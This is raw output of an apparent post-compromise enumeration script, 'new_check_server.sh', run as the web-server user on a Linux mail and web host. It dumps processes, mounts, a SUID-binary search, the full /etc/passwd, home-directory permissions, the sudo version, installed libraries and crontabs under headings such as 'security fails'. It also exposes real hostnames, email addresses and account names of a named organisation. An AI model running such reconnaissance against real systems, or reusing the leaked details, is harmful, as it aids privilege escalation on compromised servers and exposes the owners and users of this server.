postfix 2008 0.0 0.0 8840 2092 ? S 10:30 0:00 \_ pipe -n spam -t unix flags=R user=vmail argv=/usr/bin/spamc -u vmail -e /usr/sbin/sendmail -f $sender $recipient
postfix 2011 0.0 0.0 8840 2064 ? S 10:30 0:00 \_ pipe -n spam -t unix flags=R user=vmail argv=/usr/bin/spamc -u vmail -e /usr/sbin/sendmail -f $sender $recipient
vmail 2012 0.0 0.0 5960 1340 ? Ss 10:30 0:00 | \_ /usr/bin/spamc -u vmail -e /usr/sbin/sendmail -f apache@web1.inforotor.ru alexandr.ts@gmail.com ralex@inforotor.ru user@inforotor.ru
postfix 2029 0.0 0.0 8964 2240 ? S 10:30 0:00 \_ smtp -t unix -u
postfix 2030 0.0 0.0 8968 2472 ? S 10:30 0:00 \_ virtual -t unix
clamav 7230 1.1 2.4 362536 307976 ? Ssl Mar25 2229:15 clamd
root 13473 0.0 0.0 7264 1060 ? Ss Jun03 0:54 /usr/sbin/sshd
tomcat 21341 5.7 3.8 738232 480680 ? Sl Jul05 2383:34 /usr/java/latest/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djvm=tomcat -Xms384M -Xmx384M -XX:MaxPermSize=200m -Djava.awt.headless=true -Djava.net.preferIPv4Stack=true -Dfile.encoding=UTF-8 -DjavaEncoding=UTF-8 -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.endorsed.dirs=/opt/tomcat/endorsed -classpath /opt/tomcat/bin/bootstrap.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
root 21687 0.0 0.0 1980 632 ? Ss Jul06 0:15 /usr/sbin/dovecot
nobody 21689 0.0 0.0 8288 2356 ? S Jul06 0:20 \_ dovecot-auth
nobody 25211 0.0 0.0 8016 1852 ? S 08:42 0:00 \_ dovecot-auth -w
dovecot 32642 0.0 0.0 5036 1532 ? S 10:16 0:00 \_ imap-login
dovecot 761 0.0 0.0 5032 1524 ? S 10:24 0:00 \_ pop3-login
dovecot 856 0.0 0.0 5032 1772 ? S 10:25 0:00 \_ pop3-login
dovecot 901 0.0 0.0 5036 1520 ? S 10:25 0:00 \_ imap-login
dovecot 1860 0.0 0.0 5036 1768 ? S 10:28 0:00 \_ imap-login
dovecot 1861 0.0 0.0 5032 1824 ? S 10:28 0:00 \_ pop3-login
root 21765 0.0 0.4 77460 56424 ? Ss Jul06 1:54 /usr/sbin/httpd
apache 12062 0.6 0.4 80824 54836 ? S Aug02 4:22 \_ /usr/sbin/httpd
apache 14741 0.6 0.4 81848 55572 ? S 00:11 4:12 \_ /usr/sbin/httpd
apache 975 0.0 0.0 2572 1148 ? S 10:26 0:00 | \_ sh new_check_server.sh
apache 1825 1.8 0.0 7740 5612 ? D 10:28 0:02 | \_ find / -type f -perm -4000 -exec ls -lha {} ;
apache 16658 0.6 0.4 81204 56964 ? S 00:37 3:55 \_ /usr/sbin/httpd
apache 20857 0.6 0.4 80824 54912 ? S 01:30 3:37 \_ /usr/sbin/httpd
apache 21071 0.6 0.4 81080 55092 ? S 01:32 3:38 \_ /usr/sbin/httpd
apache 24823 0.6 0.4 80824 54976 ? S 02:18 3:14 \_ /usr/sbin/httpd
apache 10716 0.6 0.4 80824 54780 ? S 05:39 1:56 \_ /usr/sbin/httpd
apache 10723 0.6 0.4 81080 55024 ? S 05:39 1:57 \_ /usr/sbin/httpd
apache 18267 0.6 0.4 80824 54904 ? S 07:13 1:16 \_ /usr/sbin/httpd
apache 18660 0.6 0.4 80824 54884 ? S 07:19 1:09 \_ /usr/sbin/httpd
apache 18875 0.6 0.4 81080 54980 ? S 07:22 1:08 \_ /usr/sbin/httpd
apache 23144 0.6 0.4 80824 54916 ? S 08:15 0:49 \_ /usr/sbin/httpd
apache 23737 0.6 0.4 81080 54952 ? S 08:22 0:49 \_ /usr/sbin/httpd
apache 23738 0.6 0.4 81080 54872 ? S 08:22 0:45 \_ /usr/sbin/httpd
apache 23739 0.6 0.4 80824 54888 ? S 08:22 0:46 \_ /usr/sbin/httpd
apache 25575 0.5 0.4 81848 55456 ? S 08:47 0:35 \_ /usr/sbin/httpd
apache 2031 0.0 0.0 2568 1008 ? S 10:30 0:00 | \_ sh -c sh new_check_server.sh >11.txt
apache 2032 0.0 0.0 2572 1104 ? S 10:30 0:00 | \_ sh new_check_server.sh
apache 2041 0.0 0.0 2428 892 ? R 10:30 0:00 | \_ ps axfuw
apache 26481 0.5 0.4 80824 54772 ? S 08:59 0:29 \_ /usr/sbin/httpd
apache 26486 0.6 0.4 82104 56172 ? S 08:59 0:33 \_ /usr/sbin/httpd
apache 26720 0.6 0.4 81080 54936 ? S 09:02 0:32 \_ /usr/sbin/httpd
apache 29504 0.6 0.4 82360 56404 ? S 09:37 0:21 \_ /usr/sbin/httpd
root 4666 0.0 0.3 50620 42072 ? Ss 04:24 0:03 /usr/bin/spamd -d -c -m5 -H -u nobody -r /var/run/spamd.pid
nobody 4675 3.3 0.6 90524 81580 ? S 04:24 12:09 \_ spamd child
nobody 4676 2.9 0.7 97544 88272 ? R 04:24 10:46 \_ spamd child
[+]mount:
/dev/mapper/hoster-root on / type ext3 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/md0 on /boot type ext3 (rw)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)
nfsd on /proc/fs/nfsd type nfsd (rw)
[+]df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/hoster-root
288G 268G 14G 96% /
/dev/md0 243M 19M 222M 8% /boot
tmpfs 6.0G 0 6.0G 0% /dev/shm
[+]cat /etc/fstab
/dev/hoster/root / ext3 defaults 1 1
/dev/md0 /boot ext3 defaults 1 2
tmpfs /dev/shm tmpfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
sysfs /sys sysfs defaults 0 0
proc /proc proc defaults 0 0
/dev/hoster/swap swap swap defaults 0 0
**************************************************
* security fails *
* *
**************************************************
[+]mmap_min_addr:
[+]Parse /etc for Writeable files
[+] check /etc/shadow PERM
-r-------- 1 root root 1.3K Apr 8 2011 /etc/shadow
[+] check /etc/passwd PERM
-rw-r--r-- 1 root root 2.1K Jan 29 2013 /etc/passwd
[+]FHS root (ls -lha /):
total 94K
drwxr-xr-x 21 root root 4.0K Jun 11 16:54 .
drwxr-xr-x 21 root root 4.0K Jun 11 16:54 ..
-rw-r--r-- 1 root root 0 Mar 31 2011 .autofsck
-rw-r--r-- 1 root root 0 May 16 2008 .autorelabel
drwxr-xr-x 2 root root 4.0K Jul 17 04:06 bin
drwxr-xr-x 4 root root 6.0K Jul 16 12:41 boot
drwxr-xr-x 11 root root 3.4K Jan 29 2013 dev
drwxr-xr-x 74 root root 4.0K Aug 2 04:04 etc
drwxr-xr-x 8 root root 4.0K May 11 2011 home
drwxr-xr-x 13 root root 4.0K Jun 25 04:08 lib
drwx------ 2 root root 16K May 15 2008 lost+found
drwxr-xr-x 2 root root 4.0K May 11 2011 media
drwxr-xr-x 2 root root 4.0K May 11 2011 mnt
drwxr-xr-x 6 root root 4.0K Jun 6 01:14 opt
dr-xr-xr-x 266 root root 0 May 11 2011 proc
drwxr-x--- 6 root root 4.0K Jun 6 00:36 root
drwxr-xr-x 2 root root 12K Jun 19 04:07 sbin
drwxr-xr-x 2 root root 4.0K May 11 2011 selinux
drwxr-xr-x 2 root root 4.0K May 11 2011 srv
drwxr-xr-x 11 root root 0 May 11 2011 sys
drwxrwxrwt 4 root root 4.0K Aug 3 10:30 tmp
drwxr-xr-x 15 root root 4.0K May 12 2011 usr
drwxr-xr-x 24 root root 4.0K May 12 2011 var
[+]Search core dumps...
Sudo version 1.7.2p1
**************************************************
* av, firewalls *
* *
**************************************************
chkrootkit:
rkhunter:
clamav:
**************************************************
* Usefull *
* *
**************************************************
[+] Python
[+] Php
PHP 5.3.6 (cli) (built: Apr 5 2011 00:29:40)
Copyright (c) 1997-2011 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2011 Zend Technologies
[+] Perl
This is perl, v5.8.8 built for i386-linux-thread-multi
Copyright 1987-2006, Larry Wall
Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.
Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl". If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.
[+]gcc -v
[+]Ruby -v
**************************************************
* users info *
* *
**************************************************
[+] All users:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
user:x:500:500:Nik:/home/user:/bin/bash
fuks:x:501:501:Is:/home/fuks:/bin/bash
hoster:x:502:502:V:/home/hoster:/bin/bash
vmail:x:1000:12::/var/spool/vmail:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
souser:x:1001:1001:Spamooborona filter:/var/yamail:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
giver:x:1002:1002::/home/giver:/bin/bash
webmaster:x:600:600:webmaster:/home/webmaster:/bin/bash
zabbix:x:100:101:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
memcached:x:101:102:Memcached daemon:/var/run/memcached:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
clamav:x:102:103:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
tomcat:x:46:99:Tomcat JVM user.:/opt/tomcat/temp:/sbin/nologin
irotor:x:1003:1003::/home/irotor:/bin/bash
[+]Chek HOMEs for users with UID>500:
[+]check perm user(uid=500;gid=500) HOME=/home/user:
drwx------ 9 user user 4.0K 2011-08-02 15:31:39.000000000 +0400 /home/user
[+]check perm fuks(uid=501;gid=501) HOME=/home/fuks:
drwx------ 12 fuks fuks 4.0K 2013-06-24 18:52:42.000000000 +0400 /home/fuks
[+]check perm hoster(uid=502;gid=502) HOME=/home/hoster:
drwx------ 4 hoster hoster 4.0K 2008-11-27 18:12:43.000000000 +0300 /home/hoster
[+]check perm vmail(uid=1000;gid=12) HOME=/var/spool/vmail:
drwxr-xr-x 8 vmail mail 4.0K 2010-04-23 18:46:36.000000000 +0400 /var/spool/vmail
[+]check perm souser(uid=1001;gid=1001) HOME=/var/yamail:
drwxr-xr-x 2 root root 4.0K 2008-09-11 17:12:48.000000000 +0400 /var/yamail
[+]check perm giver(uid=1002;gid=1002) HOME=/home/giver:
drwx------ 11 giver giver 4.0K 2011-09-26 15:00:26.000000000 +0400 /home/giver
[+]check perm webmaster(uid=600;gid=600) HOME=/home/webmaster:
drwx------ 11 webmaster webmaster 4.0K 2013-06-11 19:22:20.000000000 +0400 /home/webmaster
[+]check perm nfsnobody(uid=65534;gid=65534) HOME=/var/lib/nfs:
drwxr-xr-x 5 root root 4.0K 2013-08-03 04:31:49.000000000 +0400 /var/lib/nfs
[+]check perm irotor(uid=1003;gid=1003) HOME=/home/irotor:
drwx------ 3 irotor irotor 4.0K 2011-04-08 20:46:47.000000000 +0400 /home/irotor
**************************************************
* library info *
* *
**************************************************
[+]LIBC:
2013-05-31 /lib/libc-2.5.so
[+]ALL from /lib /lib64 (sort -u):
-r--r--r-- 1 root root 45K 2012-02-22 21:26:24.000000000 +0400 libdevmapper-event.a
-r--r--r-- 1 root root 3.9M 2013-01-09 13:00:01.000000000 +0400 liblvm2cmd.a
-r--r--r-- 1 root root 485K 2012-02-22 21:26:17.000000000 +0400 libdevmapper.a
-r-xr-xr-x 1 root root 20K 2011-07-22 09:07:40.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13-17
-r-xr-xr-x 1 root root 20K 2012-02-22 21:26:32.000000000 +0400 libdevmapper-event.so.1.02
-r-xr-xr-x 1 root root 162K 2012-02-22 21:26:32.000000000 +0400 libdevmapper.so.1.02
-r-xr-xr-x 1 root root 217K 2011-07-22 09:07:40.000000000 +0400 libdmraid.so.1.0.0.rc13-17
-r-xr-xr-x 1 root root 5.0K 2013-01-09 13:00:04.000000000 +0400 libdevmapper-event-lvm2.so.2.02
-r-xr-xr-x 1 root root 858K 2013-01-09 13:00:03.000000000 +0400 liblvm2cmd.so.2.02
-rw-r--r-- 1 root root 65 2013-03-05 15:27:05.000000000 +0400 .libcrypto.so.0.9.8e.hmac
-rw-r--r-- 1 root root 65 2013-03-05 15:27:05.000000000 +0400 .libssl.so.0.9.8e.hmac
-rwxr-xr-x 1 root root 10K 2013-01-09 09:30:33.000000000 +0400 libpam_misc.so.0.81.2
-rwxr-xr-x 1 root root 12K 2007-03-14 21:15:10.000000000 +0300 libcap.so.1.10
-rwxr-xr-x 1 root root 12K 2009-03-25 04:52:17.000000000 +0300 libgmodule-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 13K 2007-01-06 16:01:17.000000000 +0300 libtermcap.so.2.0.8
-rwxr-xr-x 1 root root 14K 2013-05-31 02:19:03.000000000 +0400 libanl-2.5.so
-rwxr-xr-x 1 root root 15K 2013-05-31 02:19:05.000000000 +0400 libutil-2.5.so
-rwxr-xr-x 1 root root 16K 2007-01-06 08:12:05.000000000 +0300 libattr.so.1.1.0
-rwxr-xr-x 1 root root 16K 2009-03-25 04:52:17.000000000 +0300 libgthread-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 16K 2013-05-09 15:10:58.000000000 +0400 libuuid.so.1.2
-rwxr-xr-x 1 root root 17K 2013-05-31 02:19:03.000000000 +0400 libSegFault.so
-rwxr-xr-x 1 root root 20K 2011-07-22 09:07:41.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13
-rwxr-xr-x 1 root root 21K 2013-05-09 15:10:58.000000000 +0400 libss.so.2.0
-rwxr-xr-x 1 root root 21K 2013-05-31 02:19:04.000000000 +0400 libdl-2.5.so
-rwxr-xr-x 1 root root 22K 2013-05-09 15:10:58.000000000 +0400 libe2p.so.2.3
-rwxr-xr-x 1 root root 22K 2013-05-31 02:19:04.000000000 +0400 libnss_dns-2.5.so
-rwxr-xr-x 1 root root 23K 2013-05-31 02:19:05.000000000 +0400 libnss_hesiod-2.5.so
-rwxr-xr-x 1 root root 26K 2012-02-22 17:57:47.000000000 +0400 libacl.so.1.1.0
-rwxr-xr-x 1 root root 33K 2009-09-22 02:37:30.000000000 +0400 libwrap.so.0.7.6
-rwxr-xr-x 1 root root 35K 2013-05-31 02:19:05.000000000 +0400 libthread_db-1.0.so
-rwxr-xr-x 1 root root 36K 2013-05-31 02:19:04.000000000 +0400 libnss_compat-2.5.so
-rwxr-xr-x 1 root root 38K 2013-01-09 10:09:06.000000000 +0400 libvolume_id.so.0.66.0
-rwxr-xr-x 1 root root 38K 2013-05-09 15:10:58.000000000 +0400 libblkid.so.1.0
-rwxr-xr-x 1 root root 44K 2013-01-09 09:30:33.000000000 +0400 libpam.so.0.81.5
-rwxr-xr-x 1 root root 45K 2013-05-31 02:19:04.000000000 +0400 libcrypt-2.5.so
-rwxr-xr-x 1 root root 46K 2013-01-08 22:20:59.000000000 +0400 libgcc_s-4.1.2-20080825.so.1
-rwxr-xr-x 1 root root 46K 2013-05-31 02:19:05.000000000 +0400 libnss_nis-2.5.so
-rwxr-xr-x 1 root root 48K 2013-05-31 02:19:05.000000000 +0400 librt-2.5.so
-rwxr-xr-x 1 root root 50K 2013-05-31 02:19:04.000000000 +0400 libnss_files-2.5.so
-rwxr-xr-x 1 root root 54K 2013-01-09 09:43:31.000000000 +0400 libproc-3.2.7.so
-rwxr-xr-x 1 root root 55K 2013-05-31 02:19:05.000000000 +0400 libnss_nisplus-2.5.so
-rwxr-xr-x 1 root root 58K 2012-02-22 19:10:06.000000000 +0400 libauparse.so.0.0.0
-rwxr-xr-x 1 root root 74K 2012-07-17 12:32:17.000000000 +0400 libz.so.1.2.3
-rwxr-xr-x 1 root root 83K 2013-05-31 02:19:05.000000000 +0400 libresolv-2.5.so
-rwxr-xr-x 1 root root 92K 2011-03-06 07:51:56.000000000 +0300 libselinux.so.1
-rwxr-xr-x 1 root root 95K 2012-02-22 19:10:06.000000000 +0400 libaudit.so.0.0.0
-rwxr-xr-x 1 root root 1.3M 2013-03-05 15:27:05.000000000 +0400 libcrypto.so.0.9.8e
-rwxr-xr-x 1 root root 1.7M 2013-05-31 02:19:04.000000000 +0400 libc-2.5.so
-rwxr-xr-x 1 root root 108K 2013-05-31 02:19:04.000000000 +0400 libnsl-2.5.so
-rwxr-xr-x 1 root root 113K 2013-05-09 15:10:58.000000000 +0400 libext2fs.so.2.4
-rwxr-xr-x 1 root root 127K 2011-03-31 04:08:14.000000000 +0400 libpcre.so.0.0.1
-rwxr-xr-x 1 root root 128K 2013-05-31 02:19:03.000000000 +0400 ld-2.5.so
-rwxr-xr-x 1 root root 133K 2012-06-13 18:35:31.000000000 +0400 libexpat.so.0.5.0
-rwxr-xr-x 1 root root 135K 2013-05-31 02:19:05.000000000 +0400 libpthread-2.5.so
-rwxr-xr-x 1 root root 156K 2009-09-04 02:49:09.000000000 +0400 libsemanage.so.1
-rwxr-xr-x 1 root root 188K 2013-05-31 02:19:04.000000000 +0400 libcidn-2.5.so
-rwxr-xr-x 1 root root 212K 2013-05-31 02:19:04.000000000 +0400 libm-2.5.so
-rwxr-xr-x 1 root root 215K 2011-07-22 09:07:41.000000000 +0400 libdmraid.so.1.0.0.rc13
-rwxr-xr-x 1 root root 240K 2010-03-31 12:26:18.000000000 +0400 libsepol.so.1
-rwxr-xr-x 1 root root 248K 2011-08-11 21:33:53.000000000 +0400 libdbus-1.so.3.4.0
-rwxr-xr-x 1 root root 254K 2009-03-25 04:52:17.000000000 +0300 libgobject-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 294K 2013-03-05 15:27:05.000000000 +0400 libssl.so.0.9.8e
-rwxr-xr-x 1 root root 630K 2009-03-25 04:52:17.000000000 +0300 libglib-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 7.5K 2013-05-31 02:19:03.000000000 +0400 libBrokenLocale-2.5.so
-rwxr-xr-x 1 root root 7.7K 2007-01-06 10:57:38.000000000 +0300 libkeyutils-1.2.so
-rwxr-xr-x 1 root root 7.7K 2013-05-09 15:10:58.000000000 +0400 libcom_err.so.2.1
-rwxr-xr-x 1 root root 9.7K 2013-01-09 09:30:33.000000000 +0400 libpamc.so.0.81.0
-rwxr-xr-x 1 root root 989K 2010-07-12 20:11:02.000000000 +0400 libdb-4.3.so
/lib/:
drwxr-xr-x 2 root root 4.0K 2012-11-06 17:30:36.000000000 +0400 iptables
drwxr-xr-x 2 root root 4.0K 2013-01-29 13:36:04.000000000 +0400 device-mapper
drwxr-xr-x 2 root root 4.0K 2013-01-29 13:36:34.000000000 +0400 firmware
drwxr-xr-x 2 root root 4.0K 2013-05-29 13:33:35.000000000 +0400 bdevid
drwxr-xr-x 2 root root 4.0K 2013-06-04 04:07:57.000000000 +0400 dbus-1
drwxr-xr-x 3 root root 4.0K 2013-01-29 13:35:51.000000000 +0400 security
drwxr-xr-x 3 root root 4.0K 2013-05-31 01:39:08.000000000 +0400 i686
drwxr-xr-x 3 root root 4.0K 2013-06-03 04:25:32.000000000 +0400 rtkaio
drwxr-xr-x 3 root root 4.0K 2013-06-04 04:07:56.000000000 +0400 udev
drwxr-xr-x 4 root root 4.0K 2013-07-16 12:41:48.000000000 +0400 modules
drwxr-xr-x 6 root root 4.0K 2013-01-09 07:15:07.000000000 +0400 kbd
drwxr-xr-x 13 root root 4.0K 2013-06-25 04:08:32.000000000 +0400 .
drwxr-xr-x 21 root root 4.0K 2013-06-11 16:54:24.000000000 +0400 ..
lrwxrwxrwx 1 root root 9 2013-06-03 04:25:32.000000000 +0400 ld-linux.so.2 -> ld-2.5.so
lrwxrwxrwx 1 root root 11 2013-06-03 04:25:32.000000000 +0400 libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root 11 2013-06-03 04:25:32.000000000 +0400 libm.so.6 -> libm-2.5.so
lrwxrwxrwx 1 root root 12 2013-05-20 14:40:28.000000000 +0400 libss.so.2 -> libss.so.2.0
lrwxrwxrwx 1 root root 12 2013-06-03 04:25:32.000000000 +0400 libdl.so.2 -> libdl-2.5.so
lrwxrwxrwx 1 root root 12 2013-06-03 04:25:32.000000000 +0400 librt.so.1 -> librt-2.5.so
lrwxrwxrwx 1 root root 13 2013-01-29 13:35:42.000000000 +0400 libz.so.1 -> libz.so.1.2.3
lrwxrwxrwx 1 root root 13 2013-01-29 13:36:59.000000000 +0400 libz.so -> libz.so.1.2.3
lrwxrwxrwx 1 root root 13 2013-05-20 14:40:28.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3
lrwxrwxrwx 1 root root 13 2013-06-03 04:25:32.000000000 +0400 libanl.so.1 -> libanl-2.5.so
lrwxrwxrwx 1 root root 13 2013-06-03 04:25:32.000000000 +0400 libnsl.so.1 -> libnsl-2.5.so
lrwxrwxrwx 1 root root 14 2011-03-21 17:17:31.000000000 +0300 libcap.so.1 -> libcap.so.1.10
lrwxrwxrwx 1 root root 14 2013-01-29 13:36:24.000000000 +0400 cpp -> ../usr/bin/cpp
lrwxrwxrwx 1 root root 14 2013-05-20 14:40:28.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2
lrwxrwxrwx 1 root root 14 2013-06-03 04:25:32.000000000 +0400 libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 14 2013-06-03 04:25:32.000000000 +0400 libutil.so.1 -> libutil-2.5.so
lrwxrwxrwx 1 root root 15 2012-03-15 04:23:01.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0
lrwxrwxrwx 1 root root 15 2013-05-20 14:40:28.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0
lrwxrwxrwx 1 root root 15 2013-06-03 04:25:32.000000000 +0400 libcrypt.so.1 -> libcrypt-2.5.so
lrwxrwxrwx 1 root root 16 2011-03-21 17:17:31.000000000 +0300 libattr.so.1 -> libattr.so.1.1.0
lrwxrwxrwx 1 root root 16 2011-03-21 17:17:31.000000000 +0300 libwrap.so.0 -> libwrap.so.0.7.6
lrwxrwxrwx 1 root root 16 2011-04-22 11:51:57.000000000 +0400 libpcre.so.0 -> libpcre.so.0.0.1
lrwxrwxrwx 1 root root 16 2013-01-29 13:35:51.000000000 +0400 libpam.so.0 -> libpam.so.0.81.5
lrwxrwxrwx 1 root root 16 2013-03-14 15:11:44.000000000 +0400 libssl.so.6 -> libssl.so.0.9.8e
lrwxrwxrwx 1 root root 16 2013-05-20 14:40:28.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4
lrwxrwxrwx 1 root root 16 2013-06-03 04:25:32.000000000 +0400 libresolv.so.2 -> libresolv-2.5.so
lrwxrwxrwx 1 root root 17 2012-03-15 04:22:55.000000000 +0400 libaudit.so.0 -> libaudit.so.0.0.0
lrwxrwxrwx 1 root root 17 2012-06-14 15:46:41.000000000 +0400 libexpat.so.0 -> libexpat.so.0.5.0
lrwxrwxrwx 1 root root 17 2013-01-29 13:35:51.000000000 +0400 libpamc.so.0 -> libpamc.so.0.81.0
lrwxrwxrwx 1 root root 17 2013-05-20 14:40:28.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1
lrwxrwxrwx 1 root root 17 2013-06-03 04:25:32.000000000 +0400 libnss_dns.so.2 -> libnss_dns-2.5.so
lrwxrwxrwx 1 root root 17 2013-06-03 04:25:32.000000000 +0400 libnss_nis.so.2 -> libnss_nis-2.5.so
lrwxrwxrwx 1 root root 17 2013-06-03 04:25:32.000000000 +0400 libpthread.so.0 -> libpthread-2.5.so
lrwxrwxrwx 1 root root 18 2011-03-21 17:17:31.000000000 +0300 libkeyutils.so.1 -> libkeyutils-1.2.so
lrwxrwxrwx 1 root root 18 2011-09-18 00:35:43.000000000 +0400 libdbus-1.so.3 -> libdbus-1.so.3.4.0
lrwxrwxrwx 1 root root 18 2013-01-29 13:36:04.000000000 +0400 liblvm2cmd.so -> liblvm2cmd.so.2.02
lrwxrwxrwx 1 root root 19 2011-03-21 17:17:31.000000000 +0300 libtermcap.so.2 -> libtermcap.so.2.0.8
lrwxrwxrwx 1 root root 19 2012-03-15 04:22:55.000000000 +0400 libauparse.so.0 -> libauparse.so.0.0.0
lrwxrwxrwx 1 root root 19 2013-03-14 15:11:44.000000000 +0400 libcrypto.so.6 -> libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 19 2013-06-03 04:25:32.000000000 +0400 libnss_files.so.2 -> libnss_files-2.5.so
lrwxrwxrwx 1 root root 19 2013-06-03 04:25:32.000000000 +0400 libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx 1 root root 20 2012-03-15 04:22:56.000000000 +0400 libdevmapper.so -> libdevmapper.so.1.02
lrwxrwxrwx 1 root root 20 2013-06-03 04:25:32.000000000 +0400 libnss_compat.so.2 -> libnss_compat-2.5.so
lrwxrwxrwx 1 root root 20 2013-06-03 04:25:32.000000000 +0400 libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
lrwxrwxrwx 1 root root 21 2013-01-29 13:35:51.000000000 +0400 libpam_misc.so.0 -> libpam_misc.so.0.81.2
lrwxrwxrwx 1 root root 21 2013-06-03 04:25:32.000000000 +0400 libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
lrwxrwxrwx 1 root root 22 2013-01-29 13:36:03.000000000 +0400 libvolume_id.so.0 -> libvolume_id.so.0.66.0
lrwxrwxrwx 1 root root 22 2013-03-14 15:11:44.000000000 +0400 .libssl.so.6.hmac -> .libssl.so.0.9.8e.hmac
lrwxrwxrwx 1 root root 22 2013-06-03 04:25:32.000000000 +0400 libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
lrwxrwxrwx 1 root root 23 2011-03-21 17:17:31.000000000 +0300 libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 23 2011-09-18 00:35:43.000000000 +0400 libdmraid.so -> libdmraid.so.1.0.0.rc13
lrwxrwxrwx 1 root root 25 2013-03-14 15:11:44.000000000 +0400 .libcrypto.so.6.hmac -> .libcrypto.so.0.9.8e.hmac
lrwxrwxrwx 1 root root 26 2011-03-21 17:17:31.000000000 +0300 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2011-03-21 17:17:31.000000000 +0300 libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2011-03-21 17:17:31.000000000 +0300 libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2012-03-15 04:22:56.000000000 +0400 libdevmapper-event.so -> libdevmapper-event.so.1.02
lrwxrwxrwx 1 root root 28 2013-01-29 13:35:19.000000000 +0400 libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx 1 root root 31 2013-01-29 13:36:04.000000000 +0400 libdevmapper-event-lvm2.so -> libdevmapper-event-lvm2.so.2.02
lrwxrwxrwx 1 root root 34 2011-09-18 00:35:43.000000000 +0400 libdmraid-events-isw.so -> libdmraid-events-isw.so.1.0.0.rc13
lrwxrwxrwx 1 root root 46 2013-01-29 13:36:04.000000000 +0400 libdevmapper-event-lvm2mirror.so -> device-mapper/libdevmapper-event-lvm2mirror.so
lrwxrwxrwx 1 root root 48 2013-01-29 13:36:04.000000000 +0400 libdevmapper-event-lvm2snapshot.so -> device-mapper/libdevmapper-event-lvm2snapshot.so
total 15M
**************************************************
* crontab info *
* *
**************************************************
[+]List of CRON tabs:
4408691 4 -rwxr-xr-x 1 root root 354 Aug 11 2010 /etc/cron.daily/tmpwatch
4408319 4 -rwxr-xr-x 1 root root 180 Jun 4 2012 /etc/cron.daily/logrotate
4407379 4 -rwxr-xr-x 1 root root 418 May 30 2012 /etc/cron.daily/makewhatis.cron
4408041 4 -rwxr-xr-x 1 root root 137 Sep 3 2009 /etc/cron.daily/mlocate.cron
32325734 4 -rwxr-xr-x 1 root root 296 Feb 25 14:06 /etc/cron.daily/rpm
